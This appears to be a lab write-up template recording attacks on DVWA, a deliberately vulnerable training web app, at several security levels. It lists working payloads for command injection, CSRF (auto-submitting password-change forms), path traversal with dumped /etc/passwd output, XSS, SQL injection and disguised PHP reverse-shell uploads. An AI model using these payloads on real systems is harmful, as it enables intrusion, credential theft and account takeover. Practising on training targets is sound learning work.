machine: DVWA

ip: 10.74.145.131


------------------------------------------------------------------------------
Vulnerability: Bruteforce attack
-----------------------------------------------------------------------------

security: Low, Medium & high  ===
=== === === === ===

Objective:-



Steps to reproduce:-    (same steps in all security cases)

1> captured the login request in burpsuite.

2> send it to indruder

3> perform a cluster bomb attack

4> found Username - admin and Password - password

Payloads Used:-

      P1 - for username > /usr/share/seclists/Usernames/top-usernames-shortlist.txt

      P2 - for password > /usr/share/seclists/Passwords/Leaked-Databases/rockyou-05.txt

Evidence:-



Impact:-



Remediation/Recommendation:-



$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

Vulnerability: Command Execution
-----------------------------------------------------------------------------

security: Low,Medium & High ===
=== === === === ===

Objective:-



Steps to reproduce:-  (security: Low)

1> it contains a page for ping ip address

2> first ping a localhost it give output on the page.

3> try a basic payload with ip

4> gives output of both on the page.

Payloads Used:-

    > 127.0.0.1;id
==============================================================================
Steps to reproduce:-  (security: Medium)

1> again try a basic payload using (;)  - gives error

2> view its source page found ';' , '&&' blacklisted.

3> tried with another payload

4> gives output on the page


Payloads Used:-

     > 127.0.0.1&id


============================================================================
Steps to reproduce:-  (security: High)

1>again try a basic payloads - gives error

2> view its source page

3> tried with another payload that works against the code

4> its not working because of proper validation


Payloads tried:-

     > 127.0.0.1;id
     > 127.0.0.1&&id
     > 127.0.0.1|id
     > 127.0.0.1$(id)
     > 127.0.0.1`id`
     > 127.0.0.1%0aid



Evidence:-



Impact:-



Remediation/Recommendation:-


$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

Vulnerability: CSRF
-----------------------------------------------------------------------------

security: Low,Medium & High  ===
=== === === === ===

Objective:-



Steps to reproduce:-    (security: Low)

1> in the page it changes the password without CSRF token

2> captured the request in burpsuite

3> generate a CSRF Poc (http://burpsuite/show/1/xoqa3net0vwmhkuv59qwzkzuh2v0razr)

4> paste it in browser and it changed password.

Payloads Used:-

        > csrf PoC link: http://burpsuite/show/1/xoqa3net0vwmhkuv59qwzkzuh2v0razr
        > code:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://10.74.145.131/vulnerabilities/csrf/">
      <input type="hidden" name="password&#95;new" value="news" />
      <input type="hidden" name="password&#95;conf" value="news" />
      <input type="hidden" name="Change" value="Change" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

================================================================================

Steps to reproduce:-    (security: Medium)

1> in the page it changes the password without CSRF token

2> captured the request in burpsuite

3> generate a CSRF Poc (http://burpsuite/show/2/pymcyafp83oof7lul8h6ef5juk7kfnn8)

4> paste it in browser and it changed password.

Payloads Used:-

      > CSRF PoC link : http://burpsuite/show/2/pymcyafp83oof7lul8h6ef5juk7kfnn8

      > code :

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://10.74.145.131/vulnerabilities/csrf/">
      <input type="hidden" name="password&#95;new" value="new" />
      <input type="hidden" name="password&#95;conf" value="new" />
      <input type="hidden" name="Change" value="Change" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

===============================================================================

Steps to reproduce:-    (security: High)

1> in the page it changes the password without CSRF token

2> captured the request in burpsuite

3> generate a CSRF Poc (http://burpsuite/show/5/w0lmahdy1n904ip0m2af8bdwxl99h6bl)

4> paste it in browser and it changed password.

Payloads Used:-

      > CSRF PoC link : http://burpsuite/show/5/w0lmahdy1n904ip0m2af8bdwxl99h6bl

      > code :

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://10.74.145.131/vulnerabilities/csrf/">
      <input type="hidden" name="password&#95;current" value="hjkl" />
      <input type="hidden" name="password&#95;new" value="hjkll" />
      <input type="hidden" name="password&#95;conf" value="hjkll" />
      <input type="hidden" name="Change" value="Change" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>



Evidence:-



Impact:-



Remediation/Recommendation:-




$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

Vulnerability: File Inclusion
-----------------------------------------------------------------------------

security: Low,Medium & High  ===
=== === === === ===

Objective:-



Steps to reproduce:-     (security: Low)

1> check out the link that searches ?page=index.php

2> try to change the path to see passwd file

3> gives the output of the file on the page


Payloads Used:-

    > ../../../../../etc/passwd

    output:

    root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh syslog:x:101:103::/home/syslog:/bin/false dvwa:x:1000:1000:dvwa,,,:/home/dvwa:/bin/bash sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin messagebus:x:103:110::/var/run/dbus:/bin/false usbmux:x:104:46:usbmux daemon,,,:/home/usbmux:/bin/false pulse:x:105:111:PulseAudio daemon,,,:/var/run/pulse:/bin/false rtkit:x:106:113:RealtimeKit,,,:/proc:/bin/false

======================================================================================

Steps to reproduce:-     (security: Medium)

1> check out the link that searches ?page=index.php

2> try to change the path to see passwd file

3> gives the output of the file on the page


Payloads Used:-

      > ../../../../../etc/passwd

     output:

     root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh syslog:x:101:103::/home/syslog:/bin/false dvwa:x:1000:1000:dvwa,,,:/home/dvwa:/bin/bash sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin messagebus:x:103:110::/var/run/dbus:/bin/false usbmux:x:104:46:usbmux daemon,,,:/home/usbmux:/bin/false pulse:x:105:111:PulseAudio daemon,,,:/var/run/pulse:/bin/false rtkit:x:106:113:RealtimeKit,,,:/proc:/bin/false


====================================================================================

Steps to reproduce:-     (security: High)

1> check out the link that searches ?page=index.php

2> try to change the path to see passwd file - gives error

3> try another payloads

4> gives the error because :

<?php

    $file = $_GET['page']; //The page we wish to display

    // Only allow include.php
    if ( $file != "include.php" ) {
        echo "ERROR: File not found!";
        exit;
    }

?>


Payloads Used:-

        > ?page=%252e%252e%252f%252e%252e%252fetc%252fpasswd
        > ?page=include.php%00../etc/passwd
        > ?page=php://filter/convert.base64-encode/resource=etc/passwd
        > ?page=zip://include.php%23etc/passwd
        > ?page=../../../../../../var/www/html/

Evidence:-



Impact:-



Remediation/Recommendation:-




$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

Vulnerability: XXS Stored
-----------------------------------------------------------------------------

security: Low,Medium & High  ===
=== === === === ===

Objective:-



Steps to reproduce:-     (security= Low)

1> there is a page of posting a message with name

2> try to inject payload with name but there is a limit in characters length

3> try to inject payload with message it injected properly

4> gives a alert after sending the message

Payloads Used:-

               <script>alert(1)</script>

================================================================================================

Steps to reproduce:-     (security= Medium)

1> try posting a normal message and view a source page

2> try to inject payload with name but there is a limit in characters length

3> try to inject payload with message it injected properly

4> gives a alert after sending the message

Payloads Used:-

              <script>alert(1)</script>

===============================================================================================

Steps to reproduce:-     (security= High)

1> tried a basic payload - not working

2> tried a error based payload - not working

3> view source code it sanitize the name and message input

Payloads Used:-

             <img src=x onerror=alert(1)>
             <script>alert(1)</script>

             and more payloads

Evidence:-



Impact:-



Remediation/Recommendation:-




$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$


Vulnerability: XXS Reflected
-----------------------------------------------------------------------------

security: Low,Medium & High  ===
=== === === === ===

Objective:-



Steps to reproduce:-     (security= Low)

1> there is page that echo anything that you enter with 'Hello' prefix

2> tried a basic xxs payload

3> gives alert hence xxs vulnerable

Payloads Used:-

              <script>alert('admin')</script>

================================================================================================

Steps to reproduce:-     (security= Medium)

1> in medium security inhanced

2> it echos the previous payload,

3> tried to bypass it by using capital letters

4> gives alert hence xxs vulnerable

Payloads Used:-

              <SCRIPT>alert('Hacked')</SCRIPT>

===============================================================================================

Steps to reproduce:-     (security= High)

1> tried xss payloads - not working

2> view source code

3> found htmlspecialchars() converts special HTML characters into entities.

4> hence every payload converts into text

Payloads Used:-

Evidence:-



Impact:-



Remediation/Recommendation:-




$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$


Vulnerability: SQL Injection
-----------------------------------------------------------------------------

security: Low,Medium & High  ===
=== === === === ===

Objective:-



Steps to reproduce:-     (security= Low)

1> there is a page that gives info through user id

2> tried sql injection with user id

3> gives the list of all users

4> sql vulnerable

Payloads Used:-

             > ' UNION SELECT user, password FROM users#

================================================================================================

Steps to reproduce:-     (security= Medium)

1> The application accepts a user ID via a GET request and inserts it directly into an SQL query without sanitizing  it

2> tried to satisfy condition based injection

3> 1 OR 1=1 gives the data

4> sql vulnerable

Payloads Used:-

===============================================================================================

Steps to reproduce:-     (security= High)

1> tried sql injections - not working

2> The input is sanitized The application calls: mysql_real_escape_string($id);
   This escapes SQL special characters (such as ' and "), making it harder for user input to alter the SQL query.

3> Only numeric input is allowed - is_numeric($id)


Payloads Used:-

Evidence:-



Impact:-



Remediation/Recommendation:-




$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$


Vulnerability: SQL Injection (Blind)
-----------------------------------------------------------------------------

security: Low,Medium & High  ===
=== === === === ===

Objective:-



Steps to reproduce:-     (security= Low)

1> tried the basic payloads - not working

2> tried boolen based payloads - not working

3> tried time based payloads - working

4> ' or sleep(3)# - it delays for 3 sec to load the page

Payloads Used:-

               ' or sleep(3)#

================================================================================================

Steps to reproduce:-     (security= Medium)

1> tried boolen based payloads - not working

2> tried time based payloads - not working

3> tried union based payloads {1 UNION SELECT 1,2-- -} - works

4> gives the detail of users

Payloads Used:-

               1 UNION SELECT 1,2-- -

===============================================================================================

Steps to reproduce:-     (security= High)

1> tried boolen based payloads - not working

2> tried time based payloads - not working

3> tried union based payloads - not working

4> view source page its not seems to be vulnerable because the is_numeric($id) check only allows numeric input,
   preventing SQL injection payloads from reaching the query.

Payloads Used:-

Evidence:-



Impact:-



Remediation/Recommendation:-




$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$


Vulnerability: File Upload
-----------------------------------------------------------------------------

security: Low,Medium & High  ===
=== === === === ===

Objective:-



Steps to reproduce:-     (security= Low)

1> there is upload option

2> tried to upload a php reverseshell file

3> it uploaded successfully without any validation

4> hence file upload Vulnerability

Payloads Used:-

              file: php-reverseshell.php

================================================================================================

Steps to reproduce:-     (security= Medium)

1> tried to upload a php reverseshell it gives error

2> viewed source page it says to upload only image/jpeg

3> convert php-reverseshell.php to oneliner.php.jpeg by using hexeditor

4> it uploaded successfully

Payloads Used:-

               oneliner.php.jpeg

===============================================================================================

Steps to reproduce:-     (security= High)

1> view its source page

2> there is validation that accects only "jpg", "JPG", "jpeg", "JPEG"

3> so again upload converted file

4> it uploaded successfully

Payloads Used:-

              oneliner.php.jpeg


Evidence:-



Impact:-



Remediation/Recommendation:-




$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$


















